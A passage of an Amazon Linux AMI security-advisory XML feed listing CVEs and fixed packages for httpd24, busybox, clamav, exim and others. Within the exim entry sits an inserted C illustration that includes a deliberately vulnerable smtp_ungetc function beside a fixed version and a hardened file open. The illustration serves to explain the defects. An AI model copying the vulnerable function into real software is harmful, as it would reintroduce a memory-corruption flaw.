arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.158.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1606</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1606: medium priority package update for microcode_ctl</title><issued date="2022-06-30 23:38:00" /><updated date="2024-05-09 17:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-21166:
A flaw was found in hw. Incomplete cleanup in specific special register write operations for some Intel(R) Processors may allow an authenticated user to enable information disclosure via local access.
CVE-2022-21151:
A flaw was found in hw. Processor optimization removal or modification of security-critical code for some Intel(R) processors may potentially allow an authenticated user to enable information disclosure via local access.
CVE-2021-33117:
Improper access control for some 3rd Generation Intel(R) Xeon(R) Scalable Processors before BIOS version MR7 may allow a local attacker to potentially enable information disclosure via local access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33117" title="" id="CVE-2021-33117" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21151" title="" id="CVE-2022-21151" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21166" title="" id="CVE-2022-21166" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl" version="2.1" release="47.40.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.40.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.40.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.40.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.40.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.40.amzn1.i686.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.40.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1607</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1607: medium priority package update for httpd24</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-06 23:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-31813:
A flaw was found in the mod_proxy module of httpd. The server may remove the X-Forwarded-* headers from a request based on the client-side Connection header hop-by-hop mechanism.
CVE-2022-30556:
A flaw was found in the mod_lua module of httpd. The data returned by the wsread function may point past the end of the storage allocated for the buffer, resulting in information disclosure.
CVE-2022-30522:
A flaw was found in the mod_sed module of httpd. A very large input to the mod_sed module can result in a denial of service due to excessively large memory allocations.
CVE-2022-29404:
A flaw was found in the mod_lua module of httpd. A malicious request to a Lua script that calls parsebody(0) can lead to a denial of service due to no default limit on the possible input size.
CVE-2022-28615:
An out-of-bounds read vulnerability was found in httpd. A very large input to the ap_strcmp_match function can lead to an integer overflow and result in an out-of-bounds read.
CVE-2022-28614:
An out-of-bounds read vulnerability was found in httpd. A very large input to the ap_rputs and ap_rwrite functions can lead to an integer overflow and result in an out-of-bounds read.
CVE-2022-28330:
An out-of-bounds read vulnerability was found in the mod_isapi module of httpd. The issue occurs when httpd is configured to process requests with the mod_isapi module.
CVE-2022-26377:
An HTTP request smuggling vulnerability was found in the mod_proxy_ajp module of httpd. This flaw allows an attacker to smuggle requests to the AJP server to which mod_proxy_ajp forwards requests.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26377" title="" id="CVE-2022-26377" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28330" title="" id="CVE-2022-28330" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28614" title="" id="CVE-2022-28614" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28615" title="" id="CVE-2022-28615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29404" title="" id="CVE-2022-29404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30522" title="" id="CVE-2022-30522" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30556" title="" id="CVE-2022-30556" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31813" title="" id="CVE-2022-31813" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-tools" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.54" 
release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.54" release="1.98.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.54" release="1.98.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.54-1.98.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.54" release="1.98.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.54" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.54-1.98.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.54" release="1.98.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.54-1.98.amzn1.i686.rpm</filename></package><package 
name="mod24_proxy_html" version="2.4.54" release="1.98.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.54-1.98.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.54" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.54-1.98.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1608</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1608: medium priority package update for busybox</title><issued date="2022-06-30 23:38:00" /><updated date="2022-07-06 23:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-28391:
An escape sequence injection attack was found in BusyBox on Alpine. For this issue to occur, a remote host's virtual terminal must contain an escape sequence, and the victim must then execute netstat. This flaw allows an attacker to inject arbitrary code, leading to a loss of integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391" title="" id="CVE-2022-28391" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox-petitboot" version="1.34.1" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.34.1-1.14.amzn1.x86_64.rpm</filename></package><package name="busybox" version="1.34.1" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.34.1-1.14.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-debuginfo-1.34.1-1.14.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.34.1-1.14.amzn1.i686.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-debuginfo-1.34.1-1.14.amzn1.i686.rpm</filename></package><package name="busybox" version="1.34.1" release="1.14.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.34.1-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1619</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1619: low priority package update for 389-admin</title><issued date="2022-07-28 20:30:00" /><updated date="2022-08-04 22:38:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3652:
A flaw was found in 389-ds-base. If an asterisk is imported as password hashes, either accidentally or maliciously, then instead of being inactive, any password will successfully match during authentication. This flaw allows an attacker to successfully authenticate as a user whose password was disabled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3652" title="" id="CVE-2021-3652" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-admin" version="1.1.46" release="5.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-admin-1.1.46-5.14.amzn1.x86_64.rpm</filename></package><package name="389-admin-debuginfo" version="1.1.46" release="5.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-admin-debuginfo-1.1.46-5.14.amzn1.x86_64.rpm</filename></package><package name="389-admin-debuginfo" version="1.1.46" release="5.14.amzn1" epoch="0" arch="i686"><filename>Packages/389-admin-debuginfo-1.1.46-5.14.amzn1.i686.rpm</filename></package><package name="389-admin" version="1.1.46" release="5.14.amzn1" epoch="0" arch="i686"><filename>Packages/389-admin-1.1.46-5.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1620</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1620: low priority package update for 389-ds-base</title><issued date="2022-07-28 20:31:00" /><updated date="2022-08-04 22:40:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3652:
A flaw was found in 389-ds-base. If an asterisk is imported as password hashes, either accidentally or maliciously, then instead of being inactive, any password will successfully match during authentication. This flaw allows an attacker to successfully authenticate as a user whose password was disabled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3652" title="" id="CVE-2021-3652" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-libs" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.10.2-9.67.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.10.2-9.67.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.10.2-9.67.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.10.2-9.67.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.10.2" release="9.67.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.10.2-9.67.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.10.2" release="9.67.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-snmp-1.3.10.2-9.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1621</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1621: important priority package update for clamav</title><issued date="2022-07-28 20:34:00" /><updated date="2022-08-04 22:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-20796:
On May 4, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in Clam AntiVirus (ClamAV) versions 0.103.4, 0.103.5, 0.104.1, and 0.104.2 could allow an authenticated, local attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog.
CVE-2022-20785:
On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in HTML file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.
CVE-2022-20771:
On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in the TIFF file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.
CVE-2022-20770:
On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in CHM file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20770" title="" id="CVE-2022-20770" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20771" title="" id="CVE-2022-20771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20785" title="" id="CVE-2022-20785" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20796" title="" id="CVE-2022-20796" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-milter" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.103.6" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.103.6-1.49.amzn1.noarch.rpm</filename></package><package name="clamav-data" version="0.103.6" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.103.6-1.49.amzn1.noarch.rpm</filename></package><package name="clamav-update" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package 
name="clamav-devel" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.103.6" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.103.6-1.49.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.103.6-1.49.amzn1.i686.rpm</filename></package><package name="clamd" version="0.103.6" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.103.6-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1622</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1622: critical priority package update for exim</title><issued date="2022-07-28 20:35:00" /><updated 
date="2022-08-04 22:42:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-27216:
Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.
CVE-2020-28026:
Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root.
CVE-2020-28025:
Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory.
CVE-2020-28024:
Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF.
CVE-2020-28023:
Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client.
CVE-2020-28022:
Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer. This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands.
CVE-2020-28019:
Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA.
CVE-2020-28014:
Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten.
CVE-2020-28013:
Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles "-F '.('" on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy.
CVE-2020-28012:
Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag.
CVE-2020-28011:
Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S. This may cause privilege escalation from exim to root.
CVE-2020-28010:
Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms).
CVE-2020-28009:
Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days).
CVE-2020-28008:
Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution.
CVE-2020-28007:
Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem.
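Added illustration, not Exim's own code: a minimal C model of two of the defect classes listed above. The first is the smtp_ungetc() pattern of CVE-2020-28024, where an int error code (EOF) is pushed back into a character buffer and the read pointer steps one byte before the buffer's start; a guard byte makes the underwrite observable without undefined behaviour. The second is the privileged-file pattern behind CVE-2020-28007 and CVE-2020-28008, where a root process opens a file under a directory owned by a less privileged user: the open uses O_NOFOLLOW and O_CLOEXEC and the descriptor is then validated with fstat() (regular file, expected owner, single link, not group or world writable), so there is no check-then-use window. Function names, buffer sizes and the guard value are this example's own choices.
<![CDATA[
```c
/* Added example, not Exim source. Two defect classes from the advisory above:
 *  1. smtp_ungetc() pushing back an int error code (EOF, -1) into a char
 *     buffer and stepping the read pointer before the buffer start
 *     (the "Buffer Underwrite" of CVE-2020-28024);
 *  2. a root process opening a file inside a directory owned by a less
 *     privileged user, where a symlink or hard link planted there redirects
 *     the write (CVE-2020-28007, CVE-2020-28008 class).
 */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define BUF_SIZE 8
#define GUARD    0xAA

/* storage[0] is a guard byte; the input buffer proper is storage + 1, so an
 * underwrite of one byte lands on the guard (defined behaviour, observable). */
struct smtp_in {
    unsigned char  storage[BUF_SIZE + 1];
    unsigned char *inptr;   /* next byte to read */
    unsigned char *inend;   /* one past the last valid byte */
};

static void smtp_in_init(struct smtp_in *s, const char *data)
{
    size_t n = strlen(data);
    if (n > BUF_SIZE) n = BUF_SIZE;
    memset(s->storage, GUARD, sizeof s->storage);
    memcpy(s->storage + 1, data, n);
    s->inptr = s->storage + 1;
    s->inend = s->inptr + n;
}

/* Next byte, or EOF when the buffer is drained. */
static int smtp_getc(struct smtp_in *s)
{
    return s->inptr < s->inend ? *s->inptr++ : EOF;
}

/* Vulnerable pattern: assumes only a previously read character is pushed
 * back. Pushing back the EOF that an empty read returned moves inptr one
 * byte before the buffer and stores 0xFF there. */
static int smtp_ungetc_vuln(struct smtp_in *s, int ch)
{
    *(--s->inptr) = (unsigned char)ch;
    return ch;
}

/* Fixed pattern: refuse error codes and refuse to back up past the start. */
static int smtp_ungetc_fixed(struct smtp_in *s, int ch)
{
    if (ch == EOF || s->inptr <= s->storage + 1)
        return EOF;
    *(--s->inptr) = (unsigned char)ch;
    return ch;
}

static int guard_intact(const struct smtp_in *s)
{
    return s->storage[0] == GUARD;
}

/* Accept an fstat() result only for a regular file owned by `owner`, with a
 * single link and not group/world writable. Kept separate from the open so
 * the policy can be tested without touching the filesystem. */
static int stat_trusted(const struct stat *st, uid_t owner)
{
    if (!S_ISREG(st->st_mode))             return 0;  /* fifo, device, directory */
    if (st->st_uid != owner)               return 0;  /* planted by another user */
    if (st->st_nlink != 1)                 return 0;  /* hard link to a root-owned file */
    if (st->st_mode & (S_IWGRP | S_IWOTH)) return 0;  /* anyone could swap contents */
    return 1;
}

/* Open `path` for appending from a privileged process. O_NOFOLLOW refuses a
 * symlink as the last path component; the checks then run on the descriptor
 * that was actually opened, so there is no check-then-use window. O_CLOEXEC
 * keeps the descriptor out of child processes (the CVE-2020-28012 class).
 * Returns the descriptor or -1. */
static int open_trusted_append(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_CLOEXEC | O_NOCTTY);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !stat_trusted(&st, owner)) {
        close(fd);
        return -1;
    }
    return fd;
}
```
]]>
O_NOFOLLOW only refuses a symlink as the final path component; a symlinked parent directory is still followed, which is why the validation is done on the opened descriptor rather than on the path beforehand.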
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28007" title="" id="CVE-2020-28007" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28008" title="" id="CVE-2020-28008" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28009" title="" id="CVE-2020-28009" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28010" title="" id="CVE-2020-28010" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28011" title="" id="CVE-2020-28011" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28012" title="" id="CVE-2020-28012" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28013" title="" id="CVE-2020-28013" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28014" title="" id="CVE-2020-28014" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28019" title="" id="CVE-2020-28019" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28022" title="" id="CVE-2020-28022" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28023" title="" id="CVE-2020-28023" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28024" title="" id="CVE-2020-28024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28025" title="" id="CVE-2020-28025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28026" title="" id="CVE-2020-28026" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27216" title="" id="CVE-2021-27216" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim" version="4.92" release="1.33.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/exim-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.33.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.33.amzn1" 